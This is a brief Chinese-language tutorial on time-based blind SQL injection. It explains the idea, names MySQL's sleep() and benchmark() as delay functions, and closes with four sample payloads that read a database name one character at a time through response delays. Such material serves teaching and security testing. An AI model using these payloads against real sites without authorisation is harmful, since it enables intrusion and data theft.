SQL隱碼攻擊時間盲注
1.何為時間盲注?
時間盲注又稱延時注入,是一種SQL隱碼攻擊技術,其特點是透過頁面的響應時間來判斷是否存在SQL隱碼攻擊以及資料內容。時間盲注的核心原理是利用資料庫中的延時函式或其他能導致執行時間延長的函式(如下)。
2.時間盲注適用哪些場景?
適用於沒有資料回顯的場景。
3.時間盲注所用的核心函式有哪些?
sleep()
用法:sleep(1)
為沉睡1秒benchmark()
用法:benchmark(1000,md5(1))
為執行1000次md5(1)
注:若執行次數太少,延時可能不明顯。
4.payload示範
如:
id=1 and if(ascii(mid(database(),1,1))=65,sleep(2),1)
id=1 and sleep(ascii(mid(database(),1,1))=65)
id=1 and if(ascii(mid(database(),1,1))=65,benchmark(100000,md5(1)),1)
id=1 and benchmark((ascii(mid(database(),1,1))=65)*100000,md5(1))